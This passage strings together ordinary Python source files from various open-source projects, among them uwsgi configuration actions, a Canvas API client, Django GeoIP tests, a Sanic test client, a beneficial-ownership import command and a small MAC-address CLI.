    """

    name = 'print'

    def __init__(self, text=None):
        """
        :param str text: Optional text to print.
        """
        super().__init__(text)
class ActionSetHostName(HookAction):
    """Set the machine's host name."""

    name = 'hostname'

    def __init__(self, name):
        """
        :param str name: Host name to set.
        """
        super().__init__(name)
class ActionAlarm(HookAction):
    """Raise an alarm. See the ``.alarms`` options group."""

    name = 'alarm'

    def __init__(self, alarm, message):
        """
        :param alarm: Alarm to trigger.
        :param str message: Message to deliver with the alarm.
        """
        super().__init__(alarm, message)
class ActionFileWrite(HookAction):
    """Write a string into the given file, creating it if missing.

    .. note:: Since 1.9.21
    """

    name = 'write'

    def __init__(self, target, text, *, append=False, newline=False):
        """
        :param str target: File to write to.
        :param str text: Text to write into file.
        :param bool append: Append text instead of rewrite.
        :param bool newline: Add a newline at the end
            (only honoured together with ``append``).
        """
        if append:
            hook = 'append'
            if newline:
                hook += 'n'
            self.name = hook
        super().__init__(target, text)
class ActionFifoWrite(HookAction):
    """Write a string into the given FIFO
    (see ``fifo_file`` from ``master_process`` params)."""

    name = 'writefifo'

    def __init__(self, target, text, *, wait=False):
        """
        :param str target: FIFO to write to.
        :param str text: Text to write.
        :param bool wait: Spin until the FIFO becomes available.
        """
        if wait:
            self.name = 'spinningfifo'
        super().__init__(target, text)
class ActionUnlink(HookAction):
    """Remove (unlink) the specified file.

    .. note:: Since 1.9.21
    """

    name = 'unlink'

    def __init__(self, target):
        """
        :param str target: Path of the file to unlink.
        """
        super().__init__(target)
| idlesign/uwsgiconf | uwsgiconf/options/main_process_actions.py | Python | bsd-3-clause | 4,593 |
"""CommMessages API Version 1.0.
This API client was generated using a template. Make sure this code is valid before using it.
"""
import logging
from datetime import date, datetime
from .base import BaseCanvasAPI
from .base import BaseModel
class CommMessagesAPI(BaseCanvasAPI):
    """CommMessages API Version 1.0."""

    def __init__(self, *args, **kwargs):
        """Init method for CommMessagesAPI."""
        super(CommMessagesAPI, self).__init__(*args, **kwargs)
        self.logger = logging.getLogger("py3canvas.CommMessagesAPI")

    def list_of_commmessages_for_user(self, user_id, end_time=None, start_time=None):
        """
        List of CommMessages for a user.

        Retrieve a paginated list of messages sent to a user.

        ``start_time``/``end_time`` accept either an ISO-8601 string
        (validated) or a date/datetime (serialised with a +00:00 offset —
        note the value itself is NOT converted to UTC first).
        """
        path = {}
        data = {}
        params = {}

        # REQUIRED - user_id
        """
        The user id for whom you want to retrieve CommMessages
        """
        params["user_id"] = user_id

        # OPTIONAL - start_time
        """
        The beginning of the time range you want to retrieve message from.
        Up to a year prior to the current date is available.
        """
        if start_time is not None:
            if issubclass(start_time.__class__, str):
                start_time = self._validate_iso8601_string(start_time)
            elif issubclass(start_time.__class__, date) or issubclass(
                start_time.__class__, datetime
            ):
                start_time = start_time.strftime("%Y-%m-%dT%H:%M:%S+00:00")
            params["start_time"] = start_time

        # OPTIONAL - end_time
        """
        The end of the time range you want to retrieve messages for.
        Up to a year prior to the current date is available.
        """
        if end_time is not None:
            if issubclass(end_time.__class__, str):
                end_time = self._validate_iso8601_string(end_time)
            elif issubclass(end_time.__class__, date) or issubclass(
                end_time.__class__, datetime
            ):
                end_time = end_time.strftime("%Y-%m-%dT%H:%M:%S+00:00")
            params["end_time"] = end_time

        self.logger.debug(
            "GET /api/v1/comm_messages with query params: {params} and form data: {data}".format(
                params=params, data=data, **path
            )
        )
        return self.generic_request(
            "GET",
            "/api/v1/comm_messages".format(**path),
            data=data,
            params=params,
            all_pages=True,
        )
class Commmessage(BaseModel):
    """Commmessage Model.

    Read-mostly representation of a Canvas CommMessage.  Property setters
    only mutate the local object and log a warning, since changes are
    never pushed back to Canvas.
    """

    def __init__(
        self,
        id=None,
        created_at=None,
        sent_at=None,
        workflow_state=None,
        _from=None,
        from_name=None,
        to=None,
        reply_to=None,
        subject=None,
        body=None,
        html_body=None,
    ):
        """Init method for Commmessage class."""
        self._id = id
        self._created_at = created_at
        self._sent_at = sent_at
        self._workflow_state = workflow_state
        # The backing attribute must NOT be named ``_from``: a property of
        # that name exists on this class, and a data descriptor always
        # shadows the instance attribute, so ``self._from = ...`` invoked
        # the property setter, which assigned ``self._from`` again —
        # infinite recursion (the original code raised RecursionError as
        # soon as an instance was constructed).
        self._from_value = _from
        self._from_name = from_name
        self._to = to
        self._reply_to = reply_to
        self._subject = subject
        self._body = body
        self._html_body = html_body
        self.logger = logging.getLogger("py3canvas.Commmessage")

    @property
    def id(self):
        """The ID of the CommMessage."""
        return self._id

    @id.setter
    def id(self, value):
        """Setter for id property."""
        # logger.warning: ``warn`` is a deprecated alias of ``warning``.
        self.logger.warning(
            "Setting values on id will NOT update the remote Canvas instance."
        )
        self._id = value

    @property
    def created_at(self):
        """The date and time this message was created."""
        return self._created_at

    @created_at.setter
    def created_at(self, value):
        """Setter for created_at property."""
        self.logger.warning(
            "Setting values on created_at will NOT update the remote Canvas instance."
        )
        self._created_at = value

    @property
    def sent_at(self):
        """The date and time this message was sent."""
        return self._sent_at

    @sent_at.setter
    def sent_at(self, value):
        """Setter for sent_at property."""
        self.logger.warning(
            "Setting values on sent_at will NOT update the remote Canvas instance."
        )
        self._sent_at = value

    @property
    def workflow_state(self):
        """The workflow state of the message. One of 'created', 'staged', 'sending', 'sent', 'bounced', 'dashboard', 'cancelled', or 'closed'."""
        return self._workflow_state

    @workflow_state.setter
    def workflow_state(self, value):
        """Setter for workflow_state property."""
        self.logger.warning(
            "Setting values on workflow_state will NOT update the remote Canvas instance."
        )
        self._workflow_state = value

    @property
    def _from(self):
        """The address that was put in the 'from' field of the message."""
        # Delegates to the distinct backing attribute to avoid recursing
        # into this property itself.
        return self._from_value

    @_from.setter
    def _from(self, value):
        """Setter for from property."""
        self.logger.warning(
            "Setting values on from will NOT update the remote Canvas instance."
        )
        self._from_value = value

    @property
    def from_name(self):
        """The display name for the from address."""
        return self._from_name

    @from_name.setter
    def from_name(self, value):
        """Setter for from_name property."""
        self.logger.warning(
            "Setting values on from_name will NOT update the remote Canvas instance."
        )
        self._from_name = value

    @property
    def to(self):
        """The address the message was sent to:."""
        return self._to

    @to.setter
    def to(self, value):
        """Setter for to property."""
        self.logger.warning(
            "Setting values on to will NOT update the remote Canvas instance."
        )
        self._to = value

    @property
    def reply_to(self):
        """The reply_to header of the message."""
        return self._reply_to

    @reply_to.setter
    def reply_to(self, value):
        """Setter for reply_to property."""
        self.logger.warning(
            "Setting values on reply_to will NOT update the remote Canvas instance."
        )
        self._reply_to = value

    @property
    def subject(self):
        """The message subject."""
        return self._subject

    @subject.setter
    def subject(self, value):
        """Setter for subject property."""
        self.logger.warning(
            "Setting values on subject will NOT update the remote Canvas instance."
        )
        self._subject = value

    @property
    def body(self):
        """The plain text body of the message."""
        return self._body

    @body.setter
    def body(self, value):
        """Setter for body property."""
        self.logger.warning(
            "Setting values on body will NOT update the remote Canvas instance."
        )
        self._body = value

    @property
    def html_body(self):
        """The HTML body of the message."""
        return self._html_body

    @html_body.setter
    def html_body(self, value):
        """Setter for html_body property."""
        self.logger.warning(
            "Setting values on html_body will NOT update the remote Canvas instance."
        )
        self._html_body = value
| tylerclair/py3canvas | py3canvas/apis/comm_messages.py | Python | mit | 7,448 |
from awards.forms import AwardForm
from awards.models import JudgeAllowance
from awards.models import Award
from challenges.decorators import judge_required
from challenges.models import Submission
from django.contrib import messages
from django.http import Http404, HttpResponseRedirect
from django.views.decorators.http import require_POST
from tower import ugettext as _
@judge_required
@require_POST
def award(request, submission_id, project=None, slug=None):
    """Award an amount to a green-lit ``Submission`` on behalf of a judge."""
    # Only winning, non-draft submissions of this challenge are eligible.
    try:
        submission = (Submission.objects
                      .select_related('phase')
                      .get(id=submission_id, phase__challenge__slug=slug,
                           phase__challenge__project__slug=project,
                           is_winner=True, is_draft=False))
    except Submission.DoesNotExist:
        raise Http404
    # Locate the judge's released allowance for the submission's phase
    # (and round, when the phase has rounds).
    judge_data = {
        'judge': request.user.get_profile(),
        'award__phase': submission.phase,
        'award__status': Award.RELEASED,
    }
    if submission.phase_round:
        judge_data.update({'award__phase_round': submission.phase_round})
    try:
        judge_allowance = JudgeAllowance.objects.get(**judge_data)
    except JudgeAllowance.DoesNotExist:
        raise Http404
    form = AwardForm(request.POST)
    if form.is_valid():
        is_allocated = judge_allowance.allocate(form.cleaned_data['amount'],
                                                submission)
        # Amount of 0 means "remove any previous award from this judge".
        if form.cleaned_data['amount'] == 0:
            submission_award = (judge_allowance.submissionaward_set
                                .filter(submission=submission))
            if submission_award:
                submission_award.delete()
                message = _("You have successfuly removed the award from this"
                            " submission")
                messages.success(request, message)
                return HttpResponseRedirect(submission.get_absolute_url())
        if is_allocated:
            message = _("You have successfuly awarded this Entry")
            messages.success(request, message)
            return HttpResponseRedirect(submission.get_absolute_url())
    # Failure path: distinguish an invalid amount from insufficient funds.
    if form.errors:
        message = _("Please enter a valid amount for the award")
    else:
        message = _("You don't have enough funding for award this submission")
    messages.error(request, message)
    return HttpResponseRedirect(submission.get_absolute_url())
| mozilla/mozilla-ignite | apps/awards/views.py | Python | bsd-3-clause | 2,471 |
from __future__ import unicode_literals
import os
from django.conf import settings
from django.contrib.gis.geos import GEOSGeometry
from django.contrib.gis.geoip import GeoIP, GeoIPException
from django.utils import unittest
from django.utils import six
# Note: Requires use of both the GeoIP country and city datasets.
# The GEOIP_DATA path should be the only setting set (the directory
# should contain links or the actual database files 'GeoIP.dat' and
# 'GeoLiteCity.dat'.
class GeoIPTest(unittest.TestCase):
    """Tests for django.contrib.gis.geoip.GeoIP.

    Expected values are tied to the bundled MaxMind country/city
    datasets; results may drift with newer database files.
    """

    def test01_init(self):
        "Testing GeoIP initialization."
        g1 = GeoIP()  # Everything inferred from GeoIP path
        path = settings.GEOIP_PATH
        g2 = GeoIP(path, 0)  # Passing in data path explicitly.
        g3 = GeoIP.open(path, 0)  # MaxMind Python API syntax.

        for g in (g1, g2, g3):
            self.assertEqual(True, bool(g._country))
            self.assertEqual(True, bool(g._city))

        # Only passing in the location of one database.
        city = os.path.join(path, 'GeoLiteCity.dat')
        cntry = os.path.join(path, 'GeoIP.dat')
        g4 = GeoIP(city, country='')
        self.assertEqual(None, g4._country)
        g5 = GeoIP(cntry, city='')
        self.assertEqual(None, g5._city)

        # Improper parameters.
        bad_params = (23, 'foo', 15.23)
        for bad in bad_params:
            self.assertRaises(GeoIPException, GeoIP, cache=bad)
            if isinstance(bad, six.string_types):
                e = GeoIPException
            else:
                e = TypeError
            self.assertRaises(e, GeoIP, bad, 0)

    def test02_bad_query(self):
        "Testing GeoIP query parameter checking."
        cntry_g = GeoIP(city='<foo>')
        # No city database available, these calls should fail.
        self.assertRaises(GeoIPException, cntry_g.city, 'google.com')
        self.assertRaises(GeoIPException, cntry_g.coords, 'yahoo.com')
        # Non-string query should raise TypeError
        self.assertRaises(TypeError, cntry_g.country_code, 17)
        self.assertRaises(TypeError, cntry_g.country_name, GeoIP)

    def test03_country(self):
        "Testing GeoIP country querying methods."
        g = GeoIP(city='<foo>')

        fqdn = 'www.google.com'
        addr = '12.215.42.19'

        for query in (fqdn, addr):
            for func in (g.country_code, g.country_code_by_addr, g.country_code_by_name):
                self.assertEqual('US', func(query))
            for func in (g.country_name, g.country_name_by_addr, g.country_name_by_name):
                self.assertEqual('United States', func(query))
            self.assertEqual({'country_code' : 'US', 'country_name' : 'United States'},
                             g.country(query))

    def test04_city(self):
        "Testing GeoIP city querying methods."
        g = GeoIP(country='<foo>')

        addr = '128.249.1.1'
        fqdn = 'tmc.edu'
        for query in (fqdn, addr):
            # Country queries should still work.
            for func in (g.country_code, g.country_code_by_addr, g.country_code_by_name):
                self.assertEqual('US', func(query))
            for func in (g.country_name, g.country_name_by_addr, g.country_name_by_name):
                self.assertEqual('United States', func(query))
            self.assertEqual({'country_code' : 'US', 'country_name' : 'United States'},
                             g.country(query))

            # City information dictionary.
            d = g.city(query)
            self.assertEqual('USA', d['country_code3'])
            self.assertEqual('Houston', d['city'])
            self.assertEqual('TX', d['region'])
            self.assertEqual(713, d['area_code'])
            geom = g.geos(query)
            self.assertTrue(isinstance(geom, GEOSGeometry))
            lon, lat = (-95.4010, 29.7079)
            lat_lon = g.lat_lon(query)
            lat_lon = (lat_lon[1], lat_lon[0])
            # All coordinate accessors agree to ~4 decimal places.
            for tup in (geom.tuple, g.coords(query), g.lon_lat(query), lat_lon):
                self.assertAlmostEqual(lon, tup[0], 4)
                self.assertAlmostEqual(lat, tup[1], 4)

    def test05_unicode_response(self):
        "Testing that GeoIP strings are properly encoded, see #16553."
        g = GeoIP()
        d = g.city('62.224.93.23')
        self.assertEqual('Schümberg', d['city'])

    def test06_unicode_query(self):
        "Testing that GeoIP accepts unicode string queries, see #17059."
        g = GeoIP()
        d = g.country('whitehouse.gov')
        self.assertEqual('US', d['country_code'])
def suite():
    """Build the test suite for this module."""
    tests = unittest.TestSuite()
    tests.addTest(unittest.makeSuite(GeoIPTest))
    return tests
def run(verbosity=1):
    """Run the module's suite with a text runner at the given verbosity."""
    runner = unittest.TextTestRunner(verbosity=verbosity)
    runner.run(suite())
| azurestandard/django | django/contrib/gis/geoip/tests.py | Python | bsd-3-clause | 4,742 |
# Copyright 2015-2017 Eficent Business and IT Consulting Services S.L.
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).
{
    "name": "Account Due List Aging Comment",
    "version": "14.0.1.0.0",
    "category": "Generic Modules/Payment",
    # The original relied on implicit string concatenation
    # ("Eficent," "Odoo Community Association (OCA),"), which produced
    # "Eficent,Odoo Community Association (OCA)," — no separating space
    # and a stray trailing comma. Use a single literal instead.
    "author": "Eficent, Odoo Community Association (OCA)",
    "website": "https://github.com/OCA/account-payment",
    "license": "AGPL-3",
    "depends": [
        "account_due_list",
    ],
    "data": [
        "views/payment_view.xml",
    ],
    "installable": True,
}
| OCA/account-payment | account_due_list_aging_comment/__manifest__.py | Python | agpl-3.0 | 539 |
#!/usr/bin/env python
traindat = '../data/fm_train_byte.dat'  # training features (byte-valued CSV)
testdat = '../data/fm_test_byte.dat'  # test features (byte-valued CSV)

# Two identical parameter sets: the example runner invokes the function
# once per entry.
parameter_list=[[traindat,testdat],[traindat,testdat]]
def kernel_linear_byte (train_fname=traindat,test_fname=testdat):
    """Build a linear kernel over byte features.

    Computes the train/train kernel matrix, re-initialises the kernel for
    train/test and computes that matrix too, then returns the kernel.
    """
    from shogun import LinearKernel, ByteFeatures, CSVFile

    train_features = ByteFeatures(CSVFile(train_fname))
    test_features = ByteFeatures(CSVFile(test_fname))

    kernel = LinearKernel(train_features, train_features)
    kernel.get_kernel_matrix()  # train vs. train
    kernel.init(train_features, test_features)
    kernel.get_kernel_matrix()  # train vs. test
    return kernel
if __name__=='__main__':
    # Run the example once with the first parameter set.
    print('LinearByte')
    kernel_linear_byte(*parameter_list[0])
| cfjhallgren/shogun | examples/undocumented/python/kernel_linear_byte.py | Python | gpl-3.0 | 634 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.management.base import BaseCommand
from django.utils.translation import activate
from django.conf import settings
from core.models import Declaration, Person, Company
from core.importers.company import CompanyImporter
from core.importers.person2company import Person2CompanyImporter
from core.universal_loggers import PythonLogger
from tasks.elastic_models import EDRPOU
from tasks.models import BeneficiariesMatching
class Command(BaseCommand):
    help = """
    """

    # Company registration states ordered from active to terminated.
    # NOTE(review): not referenced in the code visible here — presumably
    # used for ordering elsewhere (or dead); confirm before removing.
    status_order = (
        "зареєстровано",
        "зареєстровано, свідоцтво про державну реєстрацію недійсне",
        "порушено справу про банкрутство",
        "порушено справу про банкрутство (санація)",
        "в стані припинення",
        "припинено",
    )

    def add_arguments(self, parser):
        parser.add_argument(
            '--real_run',
            action='store_true',
            dest='real_run',
            default=False,
            help='Connect beneficiar owners to companies for real',
        )

    def get_latest_declaration_record(self, ownership):
        # Most recent record wins: latest declared year first, and among
        # equal years a "fixed" (corrected) record beats a non-fixed one.
        def key_fun(rec):
            return rec["year_declared"], rec.get("is_fixed", False)

        if ownership.pep_company_information:
            return sorted(
                ownership.pep_company_information,
                key=key_fun, reverse=True
            )[0]

    def connect_domestic_companies(self, save_it):
        # Ownerships manually matched ("m") to a domestic EDRPOU code.
        for ownership in BeneficiariesMatching.objects.filter(status="m"):
            k = ownership.edrpou_match.lstrip("0")
            if k == "NONE":
                continue

            if not k:
                self.stderr.write(
                    "Approved company with the key %s has no edrpou!, skipping" %
                    (
                        ownership.company_key,
                    )
                )
                self.failed += 1
                continue

            # Look the code up in the EDR register index first.
            ans = EDRPOU.find_by_edrpou(k)
            if len(ans) > 1:
                self.stderr.write(
                    "Too many companies found by code %s, for the key %s, skipping" %
                    (
                        ownership.edrpou_match,
                        ownership.company_key
                    )
                )
                self.failed += 1
                continue

            if not ans:
                # Fall back to an already-imported company record.
                # NOTE(review): ``unicode`` is py2-only — this module
                # predates a py3 migration.
                try:
                    company = Company.objects.get(
                        edrpou=unicode(ownership.edrpou_match).rjust(8, "0"))
                except Company.DoesNotExist:
                    self.stderr.write(
                        "Cannot find a company by code %s, for the key %s, skipping" %
                        (
                            ownership.edrpou_match,
                            ownership.company_key
                        )
                    )
                    self.failed += 1
                    continue
            else:
                company, created = self.importer.get_or_create_from_edr_record(ans[0].to_dict(), save_it)
                if not company:
                    self.stderr.write(
                        "Cannot create a company by code %s, for the key %s, skipping" %
                        (
                            ownership.edrpou_match,
                            ownership.company_key
                        )
                    )
                    self.failed += 1
                    continue
                else:
                    # Companies owned by PEPs are flagged as affiliated.
                    company.affiliated_with_pep = True
                    company.save()
                    if created:
                        self.companies_created += 1
                        self.stdout.write("Created company %s" % company)
                    else:
                        self.companies_updated += 1
                        self.stdout.write("Updated company %s" % company)

            try:
                person = Person.objects.get(pk=ownership.person)
            except Person.DoesNotExist:
                self.stderr.write(
                    "Cannot find a person by code %s, for the key %s, skipping" %
                    (
                        ownership.person,
                        ownership.company_key
                    )
                )
                self.failed += 1
                continue

            most_recent_record = self.get_latest_declaration_record(ownership)

            # Create/update one person-to-company link per declaration.
            for d in ownership.declarations:
                try:
                    decl = Declaration.objects.get(pk=d)
                except Declaration.DoesNotExist:
                    self.stderr.write(
                        "Cannot find a declaration by id %s, for the key %s, skipping" %
                        (
                            d,
                            ownership.company_key
                        )
                    )
                    continue

                conn, conn_created = self.conn_importer.get_or_create_from_declaration(
                    person, company,
                    most_recent_record.get("link_type", "Бенефіціарний власник"), decl, save_it)

                if most_recent_record.get("percent_of_cost"):
                    conn.share = most_recent_record["percent_of_cost"]
                    if save_it:
                        conn.save()

                if conn_created:
                    self.connections_created += 1
                    self.stdout.write("Created connection %s" % conn)
                else:
                    self.connections_updated += 1
                    self.stdout.write("Updated connection %s" % conn)

            self.successful += 1

    def connect_foreign_companies(self, save_it):
        # Ownerships resolved ("y") against foreign companies: exactly one
        # candidate is expected, already present in the local DB.
        for ownership in BeneficiariesMatching.objects.filter(status="y"):
            if len(ownership.candidates_json) != 1:
                self.stderr.write(
                    "Strange number of matches (%s) for foreign company %s" %
                    (
                        len(ownership.candidates_json),
                        ownership.company_key
                    )
                )
                continue

            try:
                company = Company.objects.get(pk=ownership.candidates_json[0]["id"])
            except Company.DoesNotExist:
                self.stderr.write(
                    "Cannot find a company by id %s, for the key %s, skipping" %
                    (
                        ownership.candidates_json[0]["id"],
                        ownership.company_key
                    )
                )
                self.failed += 1
                continue

            try:
                person = Person.objects.get(pk=ownership.person)
            except Person.DoesNotExist:
                self.stderr.write(
                    "Cannot find a person by code %s, for the key %s, skipping" %
                    (
                        ownership.person,
                        ownership.company_key
                    )
                )
                self.failed += 1
                continue

            most_recent_record = self.get_latest_declaration_record(ownership)

            for d in ownership.declarations:
                try:
                    decl = Declaration.objects.get(pk=d)
                except Declaration.DoesNotExist:
                    self.stderr.write(
                        "Cannot find a declaration by id %s, for the key %s, skipping" %
                        (
                            d,
                            ownership.company_key
                        )
                    )
                    continue

                conn, conn_created = self.conn_importer.get_or_create_from_declaration(
                    person, company,
                    most_recent_record.get("link_type", "Бенефіціарний власник"), decl, save_it)

                if most_recent_record.get("percent_of_cost"):
                    conn.share = most_recent_record["percent_of_cost"]
                    if save_it:
                        conn.save()

                if conn_created:
                    self.connections_created += 1
                    self.stdout.write("Created connection %s" % conn)
                else:
                    self.connections_updated += 1
                    self.stdout.write("Updated connection %s" % conn)

            self.successful += 1

    def handle(self, *args, **options):
        """Entry point: link PEPs to owned companies; dry-run by default
        (writes happen only with --real_run)."""
        activate(settings.LANGUAGE_CODE)

        self.importer = CompanyImporter(logger=PythonLogger("cli_commands"))
        self.conn_importer = Person2CompanyImporter(logger=PythonLogger("cli_commands"))
        self.successful = 0
        self.failed = 0
        self.companies_created = 0
        self.companies_updated = 0
        self.connections_created = 0
        self.connections_updated = 0

        self.connect_domestic_companies(options["real_run"])
        self.connect_foreign_companies(options["real_run"])

        self.stdout.write(
            "Creation failed: %s, creation successful: %s" % (self.failed, self.successful)
        )
        self.stdout.write(
            "Companies created: %s, companies updated: %s" %
            (self.companies_created, self.companies_updated)
        )
        self.stdout.write(
            "Connections created: %s, connections updated: %s" %
            (self.connections_created, self.connections_updated)
        )
| dchaplinsky/pep.org.ua | pepdb/tasks/management/commands/apply_beneficiaries.py | Python | mit | 9,604 |
# -*- coding: utf-8 -*-
import opster
import macspoof
# CLI flags for the ``spoof`` command (opster short/long/default/help rows).
spoof_options = [
    ('a', 'airport', False, 'treat interface as airport card'),
]


@opster.command(usage='INTERFACE <mac>', options=spoof_options)
def spoof(interface, mac=None, **opts):
    """spoofs mac address of given interface"""
    if interface in macspoof.interfaces.list():
        # core.spoof performs the change; its return value was previously
        # bound to an unused local (``message``).  NOTE(review): it may
        # have been intended for printing — confirm before surfacing it.
        macspoof.core.spoof(interface, mac)
    else:
        print('Please specify a valid interface.')
@opster.command(name='list|l|ls', usage='fukit')
def list(**opts):  # noqa: shadows the builtin, but opster registers by the decorator name
    """lists available network interfaces"""
    _interfaces = macspoof.interfaces.fetch()
    for iface in _interfaces:
        # Parenthesised call works as a py2 print statement too; the
        # original bare ``print '%s (%s)' % ...`` is a py3 SyntaxError.
        print('%s (%s)' % (iface.id, iface.mac))
def start():
    # Entry point: hand control to opster's command dispatcher.
    opster.dispatch()
import traceback
from sanic.log import log
# Address the test server binds to for every request cycle.
HOST = '127.0.0.1'
PORT = 42101


class SanicTestClient:
    """Drives a Sanic app in tests: boots the real server, performs one
    HTTP request against it via aiohttp from an ``after_server_start``
    listener, then stops the server and reports the collected
    request/response pair."""

    def __init__(self, app):
        self.app = app

    async def _local_request(self, method, uri, cookies=None, *args, **kwargs):
        import aiohttp

        # Absolute and protocol-relative URIs are used verbatim; anything
        # else is treated as a path on the local test server.  The original
        # tuple contained ``'ftps://' '//'`` (a missing comma) which
        # implicit string concatenation turned into the bogus prefix
        # 'ftps:////', so neither 'ftps:' nor '//' URIs were recognised.
        if uri.startswith(('http:', 'https:', 'ftp:', 'ftps:', '//')):
            url = uri
        else:
            url = 'http://{host}:{port}{uri}'.format(
                host=HOST, port=PORT, uri=uri)
        log.info(url)
        conn = aiohttp.TCPConnector(verify_ssl=False)
        async with aiohttp.ClientSession(
                cookies=cookies, connector=conn) as session:
            async with getattr(
                    session, method.lower())(url, *args, **kwargs) as response:
                try:
                    response.text = await response.text()
                except UnicodeDecodeError:
                    # Binary payload: expose it via .body only.
                    response.text = None
                response.body = await response.read()
                return response

    def _sanic_endpoint_test(
            self, method='get', uri='/', gather_request=True,
            debug=False, server_kwargs=None,
            *request_args, **request_kwargs):
        """Run the app, fire one request, return (request, response) —
        or just the response when ``gather_request`` is false.

        Raises ValueError when the request itself failed.
        """
        # Avoid the mutable-default pitfall of the original
        # ``server_kwargs={}`` signature (behaviour is unchanged).
        server_kwargs = server_kwargs or {}
        results = [None, None]
        exceptions = []

        if gather_request:
            def _collect_request(request):
                if results[0] is None:
                    results[0] = request
            self.app.request_middleware.appendleft(_collect_request)

        @self.app.listener('after_server_start')
        async def _collect_response(sanic, loop):
            try:
                response = await self._local_request(
                    method, uri, *request_args,
                    **request_kwargs)
                results[-1] = response
            except Exception as e:
                log.error(
                    'Exception:\n{}'.format(traceback.format_exc()))
                exceptions.append(e)
            self.app.stop()

        self.app.run(host=HOST, debug=debug, port=PORT, **server_kwargs)
        self.app.listeners['after_server_start'].pop()

        if exceptions:
            raise ValueError("Exception during request: {}".format(exceptions))

        if gather_request:
            try:
                request, response = results
                return request, response
            except Exception:
                # Was a bare ``except:`` (here and below), which would
                # also swallow SystemExit/KeyboardInterrupt.
                raise ValueError(
                    "Request and response object expected, got ({})".format(
                        results))
        else:
            try:
                return results[-1]
            except Exception:
                raise ValueError(
                    "Request object expected, got ({})".format(results))

    def get(self, *args, **kwargs):
        return self._sanic_endpoint_test('get', *args, **kwargs)

    def post(self, *args, **kwargs):
        return self._sanic_endpoint_test('post', *args, **kwargs)

    def put(self, *args, **kwargs):
        return self._sanic_endpoint_test('put', *args, **kwargs)

    def delete(self, *args, **kwargs):
        return self._sanic_endpoint_test('delete', *args, **kwargs)

    def patch(self, *args, **kwargs):
        return self._sanic_endpoint_test('patch', *args, **kwargs)

    def options(self, *args, **kwargs):
        return self._sanic_endpoint_test('options', *args, **kwargs)

    def head(self, *args, **kwargs):
        return self._sanic_endpoint_test('head', *args, **kwargs)
| jrocketfingers/sanic | sanic/testing.py | Python | mit | 3,419 |
import sys
import numpy as np
import matplotlib.pyplot as plt
from codim1.core import *
from codim1.assembly import *
from codim1.fast_lib import *
from codim1.post import *
import codim1.core.tools as tools
x_pts = 30
y_pts = 30
n_elements = 40
degree = 1
# Quadrature orders scale with the basis degree.
quad_min = degree + 1
quad_max = 3 * degree
quad_logr = 3 * degree + 1
quad_oneoverr = 3 * degree + 1
interior_quad_pts = 13

ek = ElasticKernelSet(1.0, 0.25)

# Straight crack from (-1, 0) to (1, 0).
left_end = np.array((-1.0, 0.0))
right_end = np.array((1.0, -0.0))
mesh = simple_line_mesh(n_elements, left_end, right_end)
# tools.plot_mesh(mesh)
# plt.show()
bf = basis_from_degree(degree)
qs = QuadStrategy(mesh, quad_min, quad_max, quad_logr, quad_oneoverr)
apply_to_elements(mesh, "basis", bf, non_gen = True)
apply_to_elements(mesh, "continuous", True, non_gen = True)
apply_to_elements(mesh, "qs", qs, non_gen = True)
apply_to_elements(mesh, "bc",
                  BC("crack_displacement", ConstantBasis([1.0, 0.0])),
                  non_gen = True)
sgbem_dofs(mesh)

matrix, rhs = sgbem_assemble(mesh, ek)
# A stray ``import ipdb;ipdb.set_trace()`` debugger breakpoint was left
# here; it halted every run of the example (and required ipdb to be
# installed). Removed.
soln_coeffs = np.linalg.solve(matrix, rhs)

x, u, t = evaluate_boundary_solution(mesh, soln_coeffs, 8)

plt.figure(1)
def plot_tx():
    """Plot the x component of the boundary traction against position."""
    positions, traction_x = x[0, :], t[0, :]
    plt.plot(positions, traction_x)
    plt.xlabel(r'X')
    plt.ylabel(r'$t_x$', fontsize=18)
def plot_ty():
    """Plot the y component of the boundary traction against position."""
    positions, traction_y = x[0, :], t[1, :]
    plt.plot(positions, traction_y)
    plt.xlabel(r'X')
    plt.ylabel(r'$t_y$', fontsize=18)
# Show t_x and t_y in separate figures.
plot_tx()
# plt.plot(x[0, :], correct)
plt.figure()
plot_ty()
plt.show()
# tx = t[0, :]
# ty = t[1, :]
# distance_to_left = np.sqrt((x[:, 0] - left_end[0]) ** 2 +
# (x[:, 1] - left_end[1]) ** 2)
#
# x = np.linspace(-5, 5, x_pts)
# # Doesn't sample 0.0!
# y = np.linspace(-15, 15, y_pts)
# X, Y = np.meshgrid(x, y)
#
# x = np.linspace(-5, 5, x_pts)
# # Doesn't sample 0.0!
# y = np.linspace(-5, 5, y_pts)
# sxx = np.zeros((x_pts, y_pts))
# sxy = np.zeros((x_pts, y_pts))
# sxy2 = np.zeros((x_pts, y_pts))
# syy = np.zeros((x_pts, y_pts))
# displacement = np.zeros((x_pts, y_pts, 2))
# def fnc(x,d):
# if d == 0 and x[0] <= 1.0 and x[0] >= -1.0:
# return 1.0
# return 0.0
# # displacement_func = BasisFunctions.from_function(fnc)
# #
# # ip = InteriorPoint(mesh, dh, qs)
# # for i in range(x_pts):
# # print i
# # for j in range(y_pts):
# # displacement[j, i, :] += ip.compute((x[i], y[j]),
# # np.array([0.0, 0.0]),
# # k_t, displacement_func)
# # # sxx[j, i], sxy[j, i] = 0.5 * point_src(np.array(x[i], y[j]),
# # # np.array((0.0, 1.0)))
# # # sxy2[j, i], syy[j, i] = 0.5 * point_src(np.array(x[i], y[j]),
# # # np.array((1.0, 0.0)))
# # int_ux = displacement[:, :, 0]
# # int_uy = displacement[:, :, 1]
# #
# # plt.figure(7)
# # plt.imshow(int_ux)
# # plt.title(r'Derived $u_x$')
# # plt.colorbar()
# #
# # plt.figure(8)
# # plt.imshow(int_uy)
# # plt.title(r'Derived $u_y$')
# # plt.colorbar()
#
# # plt.figure(9)
# # plt.imshow(sxy)
# # plt.title(r'Derived $s_{xy}$')
# # plt.colorbar()
# #
# # plt.figure(10)
# # plt.imshow(sxx)
# # plt.title(r'Derived $s_{xx}$')
# # plt.colorbar()
# # plt.figure(11)
# # plt.imshow(sxy2)
# # plt.title(r'Derived $s_{xy2}$')
# # plt.colorbar()
# #
# # plt.figure(12)
# # plt.imshow(syy)
# # plt.title(r'Derived $s_{yy}$')
# # plt.colorbar()
# # plt.figure(11)
# # plt.imshow(int_ux - exact_grid_ux)
# # plt.title(r'Error in $u_x$')
# # plt.colorbar()
#
# plt.show()
| tbenthompson/codim1 | examples/dislocation.py | Python | mit | 3,530 |
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
